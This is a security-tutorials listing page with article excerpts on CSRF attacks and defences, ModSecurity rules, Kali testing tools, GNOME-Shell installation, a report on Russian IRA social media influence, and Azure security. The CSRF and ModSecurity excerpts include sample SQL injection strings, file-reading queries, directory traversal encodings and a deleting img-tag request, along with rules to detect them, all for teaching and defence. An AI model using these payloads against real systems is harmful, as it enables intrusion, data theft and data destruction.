Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

174 Articles
article-image-cross-site-request-forgery
Packt
17 Nov 2014
9 min read
Save for later

Cross-site Request Forgery

Packt
17 Nov 2014
9 min read
In this article by Y.E Liang, the author of JavaScript Security, we will cover cross-site forgery. This topic is not exactly new. In this article, we will go deeper into cross-site forgery and learn the various techniques of defending against it. (For more resources related to this topic, see here.) Introducing cross-site request forgery Cross-site request forgery (CSRF) exploits the trust that a site has in a user's browser. It is also defined as an attack that forces an end user to execute unwanted actions on a web application in which the user is currently authenticated. Examples of CSRF We will now take a look at a basic CSRF example: Go to the source code and change the directory. Run the following command: python xss_version.py Remember to start your MongoDB process as well. Next, open external.html found in templates, in another host, say http://localhost:8888. You can do this by starting the server, which can be done by running pyton xss_version.py –port=8888, and then visiting http://loaclhost:8888/todo_external. You will see the following screenshot: Adding a new to-do item Click on Add To Do, and fill in a new to-do item, as shown in the following screenshot: Adding a new to-do item and posting it Next, click on Submit. Going back to your to-do list app at http://localhost:8000/todo and refreshing it, you will see the new to-do item added to the database, as shown in the following screenshot: To-do item is added from an external app; this is dangerous! To attack the to-do list app, all we need to do is add a new item that contains a line of JavaScript, as shown in the following screenshot: Adding a new to do for the Python version Now, click on Submit. Then, go back to your to-do app at http://localhost:8000/todo, and you will see two subsequent alerts, as shown in the following screenshot: Successfully injected JavaScript part 1 So here's the first instance where CSRF happens: Successfully injected JavaScript part 2 Take note that this can happen to the other backend written in other languages as well. Now go to your terminal, turn off the Python server backend, and change the directory to node/. Start the node server by issuing this command: node server.js This time around, the server is running at http://localhost:8080, so remember to change the $.post() endpoint to http://localhost:8080 instead of http://localhost:8000 in external.html, as shown in the following code:    function addTodo() {      var data = {        text: $('#todo_title').val(),        details:$('#todo_text').val()      }      // $.post('http://localhost:8000/api/todos', data,      function(result) {      $.post('http://localhost:8080/api/todos', data,      function(result) {        var item = todoTemplate(result.text, result.details);        $('#todos').prepend(item);        $("#todo-form").slideUp();      })    } The line changed is found at addTodo(); the highlighted code is the correct endpoint for this section. Now, going back to external.html, add a new to-do item containing JavaScript, as shown in the following screenshot: Trying to inject JavaScript into a to-do app based on Node.js As usual, submit the item. Go to http://localhost:8080/api/ and refresh; you should see two alerts (or four alerts if you didn't delete the previous ones). The first alert is as follows: Successfully injected JavaScript part 1 The second alert is as follows: Successfully injected JavaScript part 1 Now that we have seen what can happen to our app if we suffered a CSRF attack, let's think about how such attacks can happen. Basically, such attacks can happen when our API endpoints (or URLs accepting the requests) are not protected at all. Attackers can exploit such vulnerabilities by simply observing which endpoints are used and attempt to exploit them by performing a basic HTTP POST operation to it. Basic defense against CSRF attacks If you are using modern frameworks or packages, the good news is that you can easily protect against such attacks by turning on or making use of CSRF protection. For example, for server.py, you can turn on xsrf_cookie by setting it to True, as shown in the following code: class Application(tornado.web.Application):    def __init__(self):        handlers = [            (r"/api/todos", Todos),            (r"/todo", TodoApp)          ]        conn = pymongo.Connection("localhost")        self.db = conn["todos"]        settings = dict(            xsrf_cookies=True,            debug=True,            template_path=os.path.join(os.path.dirname(__file__),            "templates"),            static_path=os.path.join(os.path.dirname(__file__),            "static")        )        tornado.web.Application.__init__(self, handlers, **settings) Note the highlighted line, where we set xsrf_cookies=True. Have a look at the following code snippet: var express   = require('express'); var bodyParser = require('body-parser'); var app       = express(); var session   = require('cookie-session'); var csrf   = require('csrf');   app.use(csrf()); app.use(bodyParser()); The highlighted lines are the new lines (compared to server.js) to add in CSRF protection. Now that both backends are equipped with CSRF protection, you can try to make the same post from external.html. You will not be able to make any post from external.html. For example, you can open Chrome's developer tool and go to Network. You will see the following: POST forbidden On the terminal, you will see a 403 error from our Python server, which is shown in the following screenshot: POST forbidden from the server side Other examples of CSRF CSRF can also happen in many other ways. In this section, we'll cover the other basic examples on how CSRF can happen. CSRF using the <img> tags This is a classic example. Consider the following instance: <img src=http://yousite.com/delete?id=2 /> Should you load a site that contains this img tag, chances are that a piece of data may get deleted unknowingly. Now that we have covered the basics of preventing CSRF attacks through the use of CSRF tokens, the next question you may have is: what if there are times when you need to expose an API to an external app? For example, Facebook's Graph API, Twitter's API, and so on, allow external apps not only to read, but also write data to their system. How do we prevent malicious attacks in this situation? We'll cover this and more in the next section. Other forms of protection Using CSRF tokens may be a convenient way to protect your app from CSRF attacks, but it can be a hassle at times. As mentioned in the previous section, what about the times when you need to expose an API to allow mobile access? Or, your app is growing so quickly that you want to accelerate that growth by creating a Graph API of your own. How do you manage it then? In this section, we will go quickly over the techniques for protection. Creating your own app ID and app secret – OAuth-styled Creating your own app ID and app secret is similar to what the major Internet companies are doing right now: we require developers to sign up for developing accounts and to attach an application ID and secret key for each of the apps. Using this information, the developers will need to exchange OAuth credentials in order to make any API calls, as shown in the following screenshot: Google requires developers to sign up, and it assigns the client ID On the server end, all you need to do is look for the application ID and secret key; if it is not present, simply reject the request. Have a look at the following screenshot: The same thing with Facebook; Facebook requires you to sign up, and it assigns app ID and app secret Checking the Origin header Simply put, you want to check where the request is coming from. This is a technique where you can check the Origin header. The Origin header, in layman's terms, refers to where the request is coming from. There are at least two use cases for the usage of the Origin header, which are as follows: Assuming your endpoint is used internally (by your own web application) and checking whether the requests are indeed made from the same website, that is, your website. If you are creating an endpoint for external use, such as those similar to Facebook's Graph API, then you can make those developers register the website URL where they are going to use the API. If the website URL does not match with the one that is being registered, you can reject this request. Note that the Origin header can also be modified; for example, an attacker can provide a header that is modified. Limiting the lifetime of the token Assuming that you are generating your own tokens, you may also want to limit the lifetime of the token, for instance, making the token valid for only a certain time period if the user is logged in to your site. Similarly, your site can make this a requirement in order for the requests to be made; if the token does not exist, HTTP requests cannot be made. Summary In this article, we covered the basic forms of CSRF attacks and how to defend against it. Note that these security loopholes can come from both the frontend and server side. Resources for Article: Further resources on this subject: Implementing Stacks using JavaScript [Article] Cordova Plugins [Article] JavaScript Promises – Why Should I Care? [Article]
Read more
  • 0
  • 0
  • 12359

article-image-install-gnome-shell-ubuntu-910-karmic-koala
Packt
18 Jan 2010
3 min read
Save for later

Install GNOME-Shell on Ubuntu 9.10 "Karmic Koala"

Packt
18 Jan 2010
3 min read
Remember, these are development builds and preview snapshots, and are still in the early stages. While it appears to be functional (so far) your mileage may vary. Installing GNOME-Shell With the release of Ubuntu 9.10, a GNOME-Shell preview is included in the repositories. This makes it very easy to install (and remove) as needed. The downside is that it is just a snapshot so you are not running the latest-greatest builds. For this reason I've included instructions on installing the package as well as compiling the latest builds. I should also note that GNOME Shell requires reasonable 3D support. This means that it will likely *not* work within a virtual machine. In particular, problems have been reported trying to run GNOME Shell with 3D support in VirtualBox. Package Installation If you'd prefer to install the package and just take a sneak-peek at the snapshot, simply run the command below in your terminal: sudo aptitude install gnome-shell Manual Compilation Manually compiling GNOME Shell will allow you to use the latest and greatest builds, but it can also require more work. The notes below are based on a successful build I did in late 2009, but your mileage may vary. If you run into problems please note the following: Installing GNOME Shell does not affect your current installation, so if the build breaks you should still have a clean environment. You can find more details as well as known issues here: GnomeShell There is one package that you'll need to compile GNOME Shell called jhbuild. This package, however, has been removed from the Ubuntu 9.10 repositories for being outdated. I did find that I could use the package from the 9.04 repository and haven’t noticed any problems in doing so. To install jhbuild from the 9.04 repository use the instructions below: Visit http://packages.ubuntu.com/jaunty/all/jhbuild/download Select a mirror close to you Download / Install the .deb package. I don’t believe there are any additional dependencies needed for this package. After that package is installed you’ll want to download a GNOME Shell Build Setup script which makes this entire process much, much simpler. cd ~ wget http://git.gnome.org/cgit/gnome-shell/plain/tools/build/gnome-shell-build-setup.sh This script will handle finding and installing dependencies as well as compiling the builds, etc. To launch this script, run the command: gnome-shell-build-setup.sh You'll need to ensure that any suggested packages are installed before continuing. You may need to re-run this script multiple times until it has no more warnings. Lastly, you can begin the build process. This process took about twenty minutes on my C2D 2.0Ghz Dell laptop. My build was completely automated, but considering this is building newer and newer builds, your mileage may vary. To begin the build process on your machine, run the command: jhbuild build Ready To Launch Congratulations! You've now got GNOME-Shell installed and ready to launch. I've outlined the steps below. Please take note of the method, depending on how you installed. Also, please note that before you launch GNOME-Shell you must DISABLE Compiz. If you have Compiz running, navigate to System > Preferences > Appearances and disable it under the Desktop Effects tab. Package Installation Launch gnome-shell --replace Manual Compilation It will as follows: ~/gnome-shell/source/gnome-shell/src/gnome-shell --replace
Read more
  • 0
  • 0
  • 12276

article-image-how-ira-hacked-american-democracy-using-social-media-and-meme-warfare-to-promote-disinformation-and-polarization-a-new-report-to-senate-intelligence-committee
Natasha Mathur
18 Dec 2018
9 min read
Save for later

How IRA hacked American democracy using social media and meme warfare to promote disinformation and polarization: A new report to Senate Intelligence Committee

Natasha Mathur
18 Dec 2018
9 min read
A new report prepared for the Senate Intelligence Committee by the cybersecurity firm, New Knowledge was released yesterday. The report titled “The Tactics & Tropes of the Internet Research Agency” provides an insight into how IRA a group of Russian agents used and continue to use social media to influence politics in America by exploiting the political and racial separation in American society.   “Throughout its multi-year effort, the Internet Research Agency exploited divisions in our society by leveraging vulnerabilities in our information ecosystem. We hope that our work has resulted in a clearer picture for policymakers, platforms, and the public alike and thank the Senate Select Committee on Intelligence for the opportunity to serve”, says the report. Russian interference during the 2016 Presidential Elections comprised of Russian agents trying to hack the online voting systems, making cyber-attacks aimed at Democratic National Committee and Russian tactics of social media influence to exacerbate the political and social divisions in the US. As a part of SSCI’s investigation into IRA’s social media activities, some of the social platforms companies such as Twitter, Facebook, and Alphabet that were misused by the IRA, provided data related to IRA influence tactics. However, none of these platforms provided complete sets of related data to SSCI. “Some of what was turned over was in PDF form; other datasets contained extensive duplicates. Each lacked core components that would have provided a fuller and more actionable picture. The data set provided to the SSCI for this analysis includes data previously unknown to the public.and..is the first comprehensive analysis by entities other than the social platforms”, reads the report.   The report brings to light IRA’s strategy that involved deciding on certain themes, primarily social issues and then reinforcing these themes across its Facebook, Instagram, and YouTube content. Different topics such as black culture, anti-Clinton, pro-trump, anti-refugee, Muslim culture, LGBT culture, Christian culture, feminism, veterans, ISIS, and so on were grouped thematically on Facebook Pages and Instagram accounts to reinforce the culture and to foster the feelings of pride.  Here is a look at some key highlights from the report. Key Takeaways IRA used Instagram as the biggest tool for influence As per the report, Facebook executives, during the Congressional testimony held in April this year, hid the fact that Instagram played a major role in IRA’s influence operation. There were about 187 million engagements on Instagram compared to 76.5 million on Facebook and 73 million on Twitter, according to a data set of posts between 2015 and 2018. In 2017, IRA moved much of its activity and influence operations to Instagram as media started looking into Facebook and Twitter operations. Instagram was the most effective platform for the Internet Research Agency and approximately 40% of Instagram accounts achieved over 10,000 followers (a level referred to as “micro-influencers” by marketers) and twelve of these accounts had over 100,000 followers (“influencer” level).                                     The Tactics & Tropes of IRA “Instagram engagement outperformed Facebook, which may indicate its strength as a tool in image-centric memetic (meme) warfare. Our assessment is that Instagram is likely to be a key battleground on an ongoing basis,” reads the report. Apart from social media posts, another feature of Instagram platform activity by IRA was merchandise. This merchandise promotion aimed at building partnerships for boosting audience growth and getting the audience data. This was especially evident in the black targeted communities with hashtags #supportblackbusiness and #buyblack appearing quite frequently. In fact, sometimes these IRA pages also offered coupons in exchange for sharing content.                                               The Tactics & Tropes of IRA IRA promoted Voter Suppression Operations The report states that although Twitter and Facebook were debating on determining if there was any voter suppression content present on these platforms, three major variants of voter suppression narratives was found widespread on Twitter, Facebook, Instagram, and YouTube.  These included malicious misdirection (eg: tweets promoting false voting rules), candidates supporting redirection, and turnout depression ( eg: no need to vote, your vote doesn’t matter). The Tactics & Tropes of IRA For instance, few days before the 2016 presidential elections in the US, IRA started to implement voter suppression tactics on the Black-community targeted accounts. IRA started to spread content about voter fraud and delivering warnings that “election would be stolen and violence might be necessary”. These suppression narratives and content was largely targeted almost exclusively at the Black community on Instagram and Facebook. There was also the promotion of other kinds of content on topics such as alienation and violence to divert people’s attention away from politics. Other varieties of voter suppression narratives include: “don’t vote, stay home”, “this country is not for Black people”, “these candidates don’t care about Black people”, etc. Voter-suppression narratives aimed at non-black communities focused primarily on promoting identity and pride for communities like Native Americans, LGBT+, and Muslims. The Tactics & Tropes of IRA Then there were narratives that directly and broadly called out for voting for candidates apart from Hillary Clinton and pages on Facebook that posted repeatedly about voter fraud, stolen elections, conspiracies about machines provided by Soros, and rigged votes. IRA largely targeted black American communities IRA’s major efforts over Facebook and Instagram were targeted at Black communities in America and involved developing and recruiting Black Americans as assets. The report states that IRA adopted a cross-platform media mirage strategy which shared authentic black related content to create a strong influence on the black community over social media.   An example presented in the report is that of a case study of “Black Matters” which illustrates the extent to which IRA created “inauthentic media property” by creating different accounts across the social platforms to “reinforce its brand” and widely distribute its content.  “Using only the data from the Facebook Page posts and memes, we generated a map of the cross-linked properties – other accounts that the Pages shared from, or linked to – to highlight the complex web of IRA-run accounts designed to surround Black audiences,” reads the report. So, an individual who followed or liked one of the Black-community-targeted IRA Pages would get exposed to content from a dozen other pages more. Apart from IRA’s media mirage strategy, there was also the human asset recruitment strategy. It involved posts encouraging Americans to perform different types of tasks for IRA handlers. Some of these tasks included requests for contact with preachers from Black churches, soliciting volunteers to hand out fliers, offering free self-defense classes (Black Fist/Fit Black), requests for speakers at protests, etc. These posts appeared in the Black, Left, and Right-targeted groups, although they were mostly present in the black groups and communities. “The IRA exploited the trust of their Page audiences to develop human assets, at least some of whom were not aware of the role they played. This tactic was substantially more pronounced on Black-targeted accounts”, reads the report. IRA also created domain names such as blackvswhite.info, blackmattersusa.com, blacktivist.info, blacktolive.org, and so on. It also created YouTube channels like “Cop Block US” and “Don’t Shoot” to spread anti-Clinton videos. In response to these reports of specific black targeting at Facebook, National Association for the Advancement of Colored People (NAACP) returned a donation from Facebook and called on its users yesterday to log out of all Facebook-owned products such as Facebook, Instagram, and Whatsapp today. “NAACP remains concerned about the data breaches and numerous privacy mishaps that the tech giant has encountered in recent years, and is especially critical about those which occurred during the last presidential election campaign”, reads the NAACP announcement. IRA promoted Pro-Trump and anti-Clinton operations As per the report, IRA focussed on promoting political content surrounding pro-Donald Trump sentiments over different channels and pages regardless of whether these pages targeted conservatives, liberals, or racial and ethnic groups. The Tactics & Tropes of IRA On the other hand, large volumes of political content articulated anti-Hillary Clinton sentiments among both the Right and Left-leaning communities created by IRA. Moreover, there weren’t any communities or pages on Instagram and Facebook that favored Clinton. There were some pro-Clinton Twitter posts, however, most of the tweets were still largely anti-Clinton. The Tactics & Tropes of IRA Additionally, there were different YouTube channels created by IRA such as Williams & Kalvin, Cop Block US, don’t shoot, etc, and 25 videos across these different channels consisted election-related keywords in their title and all of these videos were anti-Hillary Clinton. An example presented in a report is of one of the political channels, Paul Jefferson, solicited videos for a #PeeOnHillary video challenge for which the hashtag appeared on Twitter and Instagram.  and shared submissions that it received. Other videos promoted by these YouTube channels were “The truth about elections”, “HILLARY RECEIVED $20,000 DONATION FROM KKK TOWARDS HER CAMPAIGN”, and so on. Also, on IRA’s Facebook account, the post with maximum shares and engagement was a conspiracy theory about President Barack Obama refusing to ban Sharia Law, and encouraging Trump to take action. The Tactics & Tropes of IRA Also, the number one post on Facebook featuring Hillary Clinton was a conspiratorial post that was made public a month before the election. The Tactics & Tropes of IRA These were some of the major highlights from the report. However, the report states that there is still a lot to be done with regard to IRA specifically. There is a need for further investigation of subscription and engagement pathways and only these social media platforms currently have that data. New Knowledge team hopes that these platforms will provide more data that can speak to the impact among the targeted communities. For more information into the tactics of IRA, read the full report here. Facebook, Twitter takes down hundreds of fake accounts with ties to Russia and Iran, suspected to influence the US midterm elections Facebook plans to change its algorithm to demote “borderline content” that promotes misinformation and hate speech on the platform Facebook’s outgoing Head of communications and policy takes the blame for hiring PR firm ‘Definers’ and reveals more
Read more
  • 0
  • 0
  • 12051

article-image-blocking-common-attacks-using-modsecurity-25-part-3
Packt
01 Dec 2009
12 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 3

Packt
01 Dec 2009
12 min read
Source code revelation Normally, requesting a file with a .php extension will cause mod_php to execute the PHP code contained within the file and then return the resulting web page to the user. If the web server is misconfigured (for example if mod_php is not loaded) then the .php file will be sent by the server without interpretation, and this can be a security problem. If the source code contains credentials used to connect to an SQL database then that opens up an avenue for attack, and of course the source code being available will allow a potential attacker to scrutinize the code for vulnerabilities. Preventing source code revelation is easy. With response body access on in ModSecurity, simply add a rule to detect the opening PHP tag: Prevent PHP source code from being disclosed SecRule RESPONSE_BODY "<?" "deny,msg:'PHP source code disclosure blocked'" Preventing Perl and JSP source code from being disclosed works in a similar manner: # Prevent Perl source code from being disclosed SecRule RESPONSE_BODY "#!/usr/bin/perl" "deny,msg:'Perl source code disclosure blocked'" # Prevent JSP source code from being disclosed SecRule RESPONSE_BODY "<%" "deny,msg:'JSP source code disclosure blocked'" Directory traversal attacks Normally, all web servers should be configured to reject attempts to access any document that is not under the web server's root directory. For example, if your web server root is /home/www, then attempting to retrieve /home/joan/.bashrc should not be possible since this file is not located under the /home/www web server root. The obvious attempt to access the /home/joan directory is, of course, easy for the web server to block, however there is a more subtle way to access this directory which still allows the path to start with /home/www, and that is to make use of the .. symbolic directory link which links to the parent directory in any given directory. Even though most web servers are hardened against this sort of attack, web applications that accept input from users may still not be checking it properly, potentially allowing users to get access to files they shouldn't be able to view via simple directory traversal attacks. This alone is reason to implement protection against this sort of attack using ModSecurity rules. Furthermore, keeping with the principle of Defense in Depth, having multiple protections against this vulnerability can be beneficial in case the web server should contain a flaw that allows this kind of attack in certain circumstances. There is more than one way to validly represent the .. link to the parent directory. URL encoding of .. yields % 2e% 2e, and adding the final slash at the end we end up with % 2e% 2e% 2f(please ignore the space). Here, then is a list of what needs to be blocked: ../ ..% 2f .% 2e/ %  2e%  2e% 2f % 2e% 2e/ % 2e./ Fortunately, we can use the ModSecurity transformation t:urlDecode. This function does all the URL decoding for us, and will allow us to ignore the percent-encoded values, and thus only one rule is needed to block these attacks: SecRule REQUEST_URI "../" "t:urlDecode,deny" Blog spam The rise of weblogs, or blogs, as a new way to present information, share thoughts, and keep an online journal has made way for a new phenomenon: blog comments designed to advertise a product or drive traffic to a website. Blog spam isn't a security problem per se, but it can be annoying and cost a lot of time when you have to manually remove spam comments (or delete them from the approval queue, if comments have to be approved before being posted on the blog). Blog spam can be mitigated by collecting a list of the most common spam phrases, and using the ability of ModSecurity to scan POST data. Any attempted blog comment that contains one of the offending phrases can then be blocked. From both a performance and maintainability perspective, using the @pmFromFile operator is the best choice when dealing with large word lists such as spam phrases. To create the list of phrases to be blocked, simply insert them into a text file, for example, /usr/local/spamlist.txt: viagra v1agra auto insurance rx medications cheap medications ... Then create ModSecurity rules to block those phrases when they are used in locations such as the page that creates new blog comments: # # Prevent blog spam by checking comment against known spam # phrases in file /usr/local/spamlist.txt # <Location /blog/comment.php> SecRule ARGS "@pmFromFile /usr/local/spamlist.txt" "t: lowercase,deny,msg:'Blog spam blocked'" </Location> Keep in mind that the spam list file can contain whole sentences—not just single words—so be sure to take advantage of that fact when creating the list of known spam phrases. SQL injection SQL injection attacks can occur if an attacker is able to supply data to a web application that is then used in unsanitized form in an SQL query. This can cause the SQL query to do completely different things than intended by the developers of the web application. Consider an SQL query like this: SELECT * FROM user WHERE username = '%s' AND password = '%s'; The flaw here is that if someone can provide a password that looks like ' OR '1'='1, then the query, with username and password inserted, will become: SELECT * FROM user WHERE username = 'anyuser' AND password = '' OR '1'='1'; This query will return all users in the results table, since the OR '1'='1' part at the end of the statement will make the entire statement true no matter what username and password is provided. Standard injection attempts Let's take a look at some of the most common ways SQL injection attacks are performed. Retrieving data from multiple tables with UNION An SQL UNION statement can be used to retrieve data from two separate tables. If there is one table named cooking_recipes and another table named user_credentials, then the following SQL statement will retrieve data from both tables: SELECT dish_name FROM recipe UNION SELECT username, password FROM user_credentials; It's easy to see how the UNION statement can allow an attacker to retrieve data from other tables in the database if he manages to sneak it into a query. A similar SQL statement is UNION ALL, which works almost the same way as UNION—the only difference is that UNION ALL will not eliminate any duplicate rows returned in the result. Multiple queries in one call If the SQL engine allows multiple statements in a single SQL query then seemingly harmless statements such as the following can present a problem: SELECT * FROM products WHERE id = %d; If an attacker is able to provide an ID parameter of 1; DROP TABLE products;, then the statement suddenly becomes: SELECT * FROM products WHERE id = 1; DROP TABLE products; When the SQL engine executes this, it will first perform the expected SELECT query, and then the DROP TABLE products statement, which will cause the products table to be deleted. Reading arbitrary files MySQL can be used to read data from arbitrary files on the system. This is done by using the LOAD_FILE() function: SELECT LOAD_FILE("/etc/passwd"); This command returns the contents of the file /etc/passwd. This works for any file to which the MySQL process has read access. Writing data to files MySQL also supports the command INTO OUTFILE which can be used to write data into files. This attack illustrates how dangerous it can be to include user-supplied data in SQL commands, since with the proper syntax, an SQL command can not only affect the database, but also the underlying file system. This simple example shows how to use MySQL to write the string some data into the file test.txt: mysql> SELECT "some data" INTO OUTFILE "test.txt"; Preventing SQL injection attacks There are three important steps you need to take to prevent SQL injection attacks: Use SQL prepared statements. Sanitize user data. Use ModSecurity to block SQL injection code supplied to web applications. These are in order of importance, so the most important consideration should always be to make sure that any code querying SQL databases that relies on user input should use prepared statements. A prepared statement looks as follows: SELECT * FROM books WHERE isbn = ? AND num_copies < ?; This allows the SQL engine to replace the question marks with the actual data. Since the SQL engine knows exactly what is data and what SQL syntax, this prevents SQL injection from taking place. The advantages of using prepared statements are twofold: They effectively prevent SQL injection. They speed up execution time, since the SQL engine can compile the statement once, and use the pre-compiled statement on all subsequent query invocations. So not only will using prepared statements make your code more secure—it will also make it quicker. The second step is to make sure that any user data used in SQL queries is sanitized. Any unsafe characters such as single quotes should be escaped. If you are using PHP, the function mysql_real_escape_string() will do this for you. Finally, let's take a look at strings that ModSecurity can help block to prevent SQL injection attacks. What to block The following table lists common SQL commands that you should consider blocking, together with a suggested regular expression for blocking. The regular expressions are in lowercase and therefore assume that the t:lowercase transformation function is used. SQL code Regular expression UNION SELECT unions+select UNION ALL SELECT unions+alls+select INTO OUTFILE intos+outfile DROP TABLE drops+table ALTER TABLE alters+table LOAD_FILE load_file SELECT * selects+* For example, a rule to detect attempts to write data into files using INTO OUTFILE looks as follows: SecRule ARGS "intos+outfile" "t:lowercase,deny,msg: 'SQL Injection'" The s+ regular expression syntax allows for detection of an arbitrary number of whitespace characters. This will detect evasion attempts such as INTO%20%20OUTFILE where multiple spaces are used between the SQL command words. Website defacement We've all seen the news stories: "Large Company X was yesterday hacked and their homepage was replaced with an obscene message". This sort of thing is an everyday occurrence on the Internet. After the company SCO initiated a lawsuit against Linux vendors citing copyright violations in the Linux source code, the SCO corporate website was hacked and an image was altered to read WE OWN ALL YOUR CODE—pay us all your money. The hack was subtle enough that the casual visitor to the SCO site would likely not be able to tell that this was not the official version of the homepage: The above image shows what the SCO homepage looked like after being defaced—quite subtle, don't you think? Preventing website defacement is important for a business for several reasons: Potential customers will turn away when they see the hacked site There will be an obvious loss of revenue if the site is used for any sort of e-commerce sales Bad publicity will tarnish the company's reputation Defacement of a site will of course depend on a vulnerability being successfully exploited. The measures we will look at here are aimed to detect that a defacement has taken place, so that the real site can be restored as quickly as possible. Detection of website defacement is usually done by looking for a specific token in the outgoing web pages. This token has been placed within the pages in advance specifically so that it may be used to detect defacement—if the token isn't there then the site has likely been defaced. This can be sufficient, but it can also allow the attacker to insert the same token into his defaced page, defeating the detection mechanism. Therefore, we will go one better and create a defacement detection technology that will be difficult for the hacker to get around. To create a dynamic token, we will be using the visitor's IP address. The reason we use the IP address instead of the hostname is that a reverse lookup may not always be possible, whereas the IP address will always be available. The following example code in JSP illustrates how the token is calculated and inserted into the page. <%@ page import="java.security.*" %> <% String tokenPlaintext = request.getRemoteAddr(); String tokenHashed = ""; String hexByte = ""; // Hash the IP address MessageDigest md5 = MessageDigest.getInstance("MD5"); md5.update(tokenPlaintext.getBytes()); byte[] digest = md5.digest(); for (int i = 0; i < digest.length; i++) { hexByte = Integer.toHexString(0xFF & digest[i]); if (hexByte.length() < 2) { hexByte = "0" + hexByte; } tokenHashed += hexByte; } // Write MD5 sum token to HTML document out.println(String.format("<span style='color: white'>%s</span>", tokenHashed)); %>   Assuming the background of the page is white, the <span style="color: white"> markup will ensure it is not visible to website viewers. Now for the ModSecurity rules to handle the defacement detection. We need to look at outgoing pages and make sure that they include the appropriate token. Since the token will be different for different users, we need to calculate the same MD5 sum token in our ModSecurity rule and make sure that this token is included in the output. If not, we block the page from being sent and sound the alert by sending an email message to the website administrator. # # Detect and block outgoing pages not containing our token # SecRule REMOTE_ADDR ".*" "phase:4,deny,chain,t:md5,t:hexEncode, exec:/usr/bin/emailadmin.sh" SecRule RESPONSE_BODY "!@contains %{MATCHED_VAR}" We are placing the rule in phase 4 since this is required when we want to inspect the response body. The exec action is used to send an email to the website administrator to let him know of the website defacement.
Read more
  • 0
  • 1
  • 11735

article-image-web-app-penetration-testing-kali
Packt
30 Oct 2013
4 min read
Save for later

Web app penetration testing in Kali

Packt
30 Oct 2013
4 min read
(For more resources related to this topic, see here.) Web apps are now a major part of today's World Wide Web. Keeping them safe and secure is the prime focus of webmasters. Building web apps from scratch can be a tedious task, and there can be small bugs in the code that can lead to a security breach. This is where web apps jump in and help you secure your application. Web app penetration testing can be implemented at various fronts such as the frontend interface, database, and web server. Let us leverage the power of some of the important tools of Kali that can be helpful during web app penetration testing. WebScarab proxy WebScarab is an HTTP and HTTPS proxy interceptor framework that allows the user to review and modify the requests created by the browser before they are sent to the server. Similarly, the responses received from the server can be modified before they are reflected in the browser. The new version of WebScarab has many more advanced features such as XSS/CSRF detection, Session ID analysis, and Fuzzing. Follow these three steps to get started with WebScarab: To launch WebScarab, browse to Applications | Kali Linux | Web applications | Web application proxies | WebScarab. Once the application is loaded, you will have to change your browser's network settings. Set the proxy settings for IP as 127.0.0.1 and Port as 8008: Save the settings and go back to the WebScarab GUI. Click on the Proxy tab and check Intercept request. Make sure that both GET and POST requests are highlighted on the left-hand side panel. To intercept the response, check Intercept responses to begin reviewing the responses coming from the server. Attacking the database using sqlninja sqlninja is a popular tool used to test SQL injection vulnerabilities in Microsoft SQL servers. Databases are an integral part of web apps hence, even a single flaw in it can lead to mass compromising of information. Let us see how sqlninja can be used for database penetration testing. To launch SQL ninja, browse to Applications | Kali Linux | Web applications | Database Exploitation | sqlninja. This will launch the terminal window with sqlninja parameters. The important parameter to look for is either the mode parameter or the –m parameter: The –m parameter specifies the type of operation we want to perform over the target database.Let us pass a basic command and analyze the output: root@kali:~#sqlninja –m test Sqlninja rel. 0.2.3-r1 Copyright (C) 2006-2008 icesurfer [-] sqlninja.conf does not exist. You want to create it now ? [y/n] This will prompt you to set up your configuration file (sqlninja.conf). You can pass the respective values and create the config file. Once you are through with it, you are ready to perform database penetration testing. The Websploit framework Websploit is an open source framework designed for vulnerability analysis and penetration testing of web applications. It is very much similar to Metasploit and incorporates many of its plugins to add functionalities. To launch Websploit, browse to Applications | Kali Linux | Web Applications | Web Application Fuzzers | Websploit. We can begin by updating the framework. Passing the update command at the terminal will begin the updating process as follows: wsf>update [*]Updating Websploit framework, Please Wait… Once the update is over, you can check out the available modules by passing the following command: wsf>show modules Let us launch a simple directory scanner module against www.target.com as follows: wsf>use web/dir_scanner wsf:Dir_Scanner>show options wsf:Dir_Scanner>set TARGET www.target.com wsf:Dir_Scanner>run Once the run command is executed, Websploit will launch the attack module and display the result. Similarly, we can use other modules based on the requirements of our scenarios. Summary In this article, we covered the following sections: WebScarab proxy Attacking the database using sqlninja The Websploit framework Resources for Article: Further resources on this subject: Installing VirtualBox on Linux [Article] Linux Shell Script: Tips and Tricks [Article] Installing Arch Linux using the official ISO [Article]
Read more
  • 0
  • 0
  • 11722

article-image-security-microsoft-azure
Packt
06 Apr 2015
9 min read
Save for later

Security in Microsoft Azure

Packt
06 Apr 2015
9 min read
In this article, we highlight some security points of interest, according to the ones explained in the book Microsoft Azure Security, by Roberto Freato. Microsoft Azure is a comprehensive set of services, which enable Cloud computing solutions for enterprises and small businesses. It supports a variety of tools and languages, providing users with building blocks that can be composed as needed. Azure is actually one of the biggest players in the Cloud computing market, solving scalability issues, speeding up the entire management process, and integrating with the existing development tool ecosystem. (For more resources related to this topic, see here.) Standards and Azure It is probably well known that the most widely accepted principles of IT security are confidentiality, integrity, and availability. Despite many security experts defining even more indicators/principles related to IT security, most security controls are focused on these principles, since the vulnerabilities are often expressed as a breach of one (or many) of these three. These three principles are also known as the CIA triangle: Confidentiality: It is about disclosure. A breach of confidentiality means that somewhere, some critical and confidential information has been disclosed unexpectedly. Integrity: It is about the state of information. A breach of integrity means that information has been corrupted or, alternatively, the meaning of the information has been altered unexpectedly. Availability: It is about interruption. A breach of availability means that information access is denied unexpectedly. Ensuring confidentiality, integrity, and availability means that information flows are always monitored and the necessary controls are enforced. To conclude, this is the purpose of a Security Management System, which, when talking about IT, becomes Information Security Management System (ISMS). The International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC) often work together to build international standards for specific technical fields. They released the ISO/IEC 27000 series to provide a family of standards for ISMS, starting from definitions (ISO/IEC 27000), up to governance (ISO/IEC 27014), and even more. Two standards of particular interests are the ISO/IEC 27001 and the ISO/IEC 27002. Microsoft manages the Azure infrastructure, At the most, users can manage the operating system inside a Virtual Machine (VM), but they do not need to administer, edit, or influence the under-the-hood infrastructure. They should not be able to do this at all. Therefore, Azure is a shared environment. This means that a customer's VM can run on the physical server of another customer and, for any given Azure service, two customers can even share the same VM (in some Platform as a Service (PaaS) and Software as a Service (SaaS) 